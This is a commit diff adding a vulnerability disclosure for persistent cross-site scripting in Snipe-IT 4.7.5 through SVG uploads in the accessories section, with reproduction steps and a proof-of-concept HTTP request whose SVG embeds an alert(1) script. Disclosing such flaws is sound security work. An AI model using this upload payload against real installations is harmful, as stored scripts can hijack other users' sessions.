Update and rename snipeIT_persistentXss to Snipe-IT_Persistent_XSS.md

Snipe-IT_Persistent_XSS.md

@@ -0,0 +1,45 @@
+# Snipe-IT Open Source Asset Management 4.7.5 - Persistent Cross-Site Scripting
+Snipe-IT v4.7.5 has persistent cross-site scripting vulnerability via uploading svg file in accessories section.
+A malicious authorized user could potentially upload an SVG with a javascript payload.
+
+## Steps to Reproduce:
+
+Upload crafted SVG file when sent request to create accessory.<br>
+Click created accessory and copy uploaded file location.<br>
+Browse uploaded SVG file location on browser.<br>
+The alert box will be opened.<br>
+
+## (PoC) Post Request:
+```
+POST /accessories HTTP/1.1
+Host: target
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://target/accessories/create
+Content-Type: multipart/form-data; boundary=---------------------------6547029722068941066578895105
+Content-Length: 1761
+Cookie: XSRF-TOKEN=*; snipeitv4_session=*; laravel_token=*
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+.
+..
+snip
+..
+.
+
+Content-Disposition: form-data; name="image"; filename="test.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+<script type="text/javascript">
+alert(1);
+</script>
+</svg>
+-----------------------------6547029722068941066578895105--
+```
+